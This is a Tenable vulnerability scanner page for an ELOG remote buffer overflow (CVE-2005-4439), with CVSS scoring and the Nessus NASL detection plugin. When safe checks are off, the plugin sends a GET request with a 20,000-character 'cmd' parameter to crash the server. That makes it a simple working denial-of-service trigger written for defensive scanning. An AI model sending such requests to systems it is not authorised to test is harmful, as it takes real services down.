ELOG Remote Buffer Overflow Vulnerabilities

2005-12-1900:00:00

www.tenable.com

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

0.093 Low

EPSS

Percentile

94.8%

JSON

The remote host appears to be using ELOG, a web-based electronic logbook application.

The version of ELOG installed on the remote host crashes when it receives HTTP requests with excessive data for the ‘mode’ and ‘cmd’ parameters. An unauthenticated attacker may be able to exploit these issues to execute arbitrary code on the remote host subject to the privileges under which the application runs.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(20321);
  script_version("1.23");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2005-4439");
  script_bugtraq_id(15932);

  script_name(english:"ELOG Remote Buffer Overflow Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by remote buffer overflow flaws.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be using ELOG, a web-based electronic
logbook application. 

The version of ELOG installed on the remote host crashes when it
receives HTTP requests with excessive data for the 'mode' and 'cmd'
parameters.  An unauthenticated attacker may be able to exploit these
issues to execute arbitrary code on the remote host subject to the
privileges under which the application runs.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Dec/949");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/12/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/12/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8080);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:8080, embedded: 0);

# Make sure the server looks like ELOG.
banner = get_http_banner(port:port);
if (banner && "Server: ELOG HTTP" >< banner) {
  # If safe checks are enabled...
  if (safe_checks()) {
    if ((report_paranoia > 1) && (egrep(pattern:"^Server: ELOG HTTP ([01]\.|2\.([0-5]\.|6\.0))", string:banner))) {
      report = string(
        "\n",
        "Nessus determined the flaw exists on the remote host based solely\n",
        "on the version number of ELOG found in the banner."
      );
      security_hole(port:port, extra:report);
      exit(0);
    }
  }
  else {
    # Loop through directories.
    if (thorough_tests) dirs = list_uniq(make_list("/elog", "/demo", cgi_dirs()));
    else dirs = make_list(cgi_dirs());

    if (http_is_dead (port:port))
      exit (0);

    foreach dir (dirs) {
      # Try to exploit the flaw to crash the service.
      r = http_send_recv3(method:"GET",
        item:string(
          dir, "/?",
          "cmd=", crap(20000) ),  port:port );

      if (isnull(r) || strlen(r[2]) == 0) {
        if (http_is_dead(port:port)) {
          security_hole(port);
          exit(0);
        }
      }
      else exit(0);
    }
  }
}